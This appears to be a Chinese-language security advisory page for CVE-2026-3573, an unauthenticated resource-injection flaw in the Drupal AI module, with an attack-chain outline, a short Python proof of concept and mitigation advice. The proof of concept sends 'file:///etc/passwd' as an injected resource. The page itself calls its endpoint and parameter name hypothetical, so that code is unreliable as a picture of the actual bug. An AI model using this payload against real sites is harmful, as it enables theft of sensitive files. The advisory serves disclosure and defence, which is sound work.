CVE-2026-3573 CVSS 7.5 高危

CVE-2026-3573 Drupal AI模块资源注入漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3573

漏洞类型

资源注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Drupal AI (Artificial Intelligence)

漏洞概述

Drupal AI模块存在一处不正确的授权漏洞，导致资源注入风险。该漏洞影响了从0.0.0到1.1.11之前以及从1.2.0到1.2.12之前的多个版本。由于无需身份验证即可利用，攻击者可发送恶意请求注入资源标识符，从而可能访问敏感信息。此漏洞对系统机密性构成高度威胁，建议用户尽快检查版本并更新。

技术细节

该漏洞的根本原因在于Drupal AI模块在处理特定请求时存在不正确的授权逻辑。根据CVSS向量分析，攻击者无需任何用户权限（PR:N）和交互（UI:N）即可通过网络（AV:N）发起攻击。漏洞触发点通常位于模块接收用户输入并调用后端服务或文件系统的接口中。由于缺乏有效的访问控制检查，攻击者能够操纵输入参数，注入恶意的资源标识符（例如`file:///etc/passwd`或内部API端点）。当应用程序信任并处理这些注入的资源时，会发生资源注入攻击，导致服务器返回本不应公开的敏感数据。尽管CVSS评分显示完整性（I）和可用性（A）未受影响，但高机密性影响（C:H）意味着攻击者可以获取系统敏感信息。这种泄露可能为后续的供应链攻击或提权提供关键情报。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站安装了受影响版本的Drupal AI模块。

STEP 2

漏洞探测

攻击者向Drupal AI的相关API端点发送特制的HTTP请求，该请求无需身份验证。

STEP 3

资源注入

在请求参数中注入恶意的资源标识符（如本地文件路径或内部URL），利用授权绕过缺陷。

STEP 4

数据泄露

服务器解析恶意请求并返回请求的资源内容，导致敏感信息泄露给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# POC for CVE-2026-3573: Resource Injection in Drupal AI
# This script attempts to inject a resource identifier to exploit incorrect authorization.

TARGET_URL = "http://[TARGET]/drupal/modules/ai/api/endpoint"

# Attempting to inject a local file path as a resource
# The parameter name 'resource' is hypothetical and represents the vulnerable input field
payload = {
    "prompt": "test",
    "resource": "file:///etc/passwd" 
}

try:
    print(f"Sending request to {TARGET_URL}...")
    response = requests.post(TARGET_URL, data=payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Potential exploitation successful!")
        print("[+] Response content:")
        print(response.text[:200]) # Print first 200 chars to check for file content
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[!] Error occurred: {e}")

影响范围

Drupal AI >= 0.0.0, < 1.1.11

Drupal AI >= 1.2.0, < 1.2.12

防御指南

临时缓解措施

如果无法立即升级，建议临时禁用Drupal AI模块以阻断攻击面。同时，检查服务器日志以确认是否已遭受攻击，并加强对敏感文件的访问控制权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-3573
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-3573
3 Details https://www.cvedetails.com/cve/CVE-2026-3573/
4 VulDB https://vuldb.com/cve/CVE-2026-3573
5 Link https://www.drupal.org/sa-contrib-2026-028

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表